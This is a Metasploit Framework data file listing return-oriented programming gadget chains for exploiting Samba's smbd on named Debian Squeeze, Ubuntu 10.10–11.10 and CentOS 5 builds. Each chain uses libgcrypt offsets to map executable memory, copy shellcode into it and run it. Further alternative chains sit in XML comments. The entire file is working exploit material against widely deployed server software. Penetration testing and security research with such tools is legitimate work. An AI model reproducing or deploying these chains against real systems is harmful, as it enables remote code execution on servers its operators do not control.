metasploit-framework/data/ropdb/samba.xml

437 lines
30 KiB
XML

<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071af4">mmap@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00009974">jmp eax</gadget>
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-->
<gadgets base="0">
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x000830a4">mmap@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007d79">jmp eax</gadget>
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006933f">pop eax ; ret</gadget>
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk for ebx</gadget>
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
<gadget value ="0x00000000">junk for edi</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x00083024">memcpy@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00004803">pop esi ; ret</gadget>
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
4 first pops are after pop esp
-->
<gadgets base="0">
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007f19">jmp eax</gadget>
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x0000922c">jmp eax</gadget>
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x0006421f">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072094">memcpy@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>3.5.10-0.107.el5 on CentOS 5</target>
</compatibility>
<!--
yum list |grep libgcrypt
libgcrypt.i386 1.4.4-5.el5 installed
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
section is writable and executable, we'll copy the shellcode over there instead of using mmap
-->
<gadgets base="0">
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp **1**</gadget>
<gadget offset="0x0006200a">pushad ; ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
<gadget offset="0x00991ff0">mmap64@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x008c8997">jmp eax</gadget>
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for esi</gadget>
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
<gadget offset="0x00991904">memcpy@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0002ab2c">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c1008">mmap64@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x0009e8e4">jmp eax</gadget>
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x001f6142">pop edx ; ret</gadget>
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x00277540">pop ebp ; ret</gadget>
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c0964">memcpy@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0000dbcf">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
<compatibility
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf86c">mmap64@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x000234e5">jmp eax</gadget>
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00394107">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf1e8">memcpy@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x00020453">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
</db>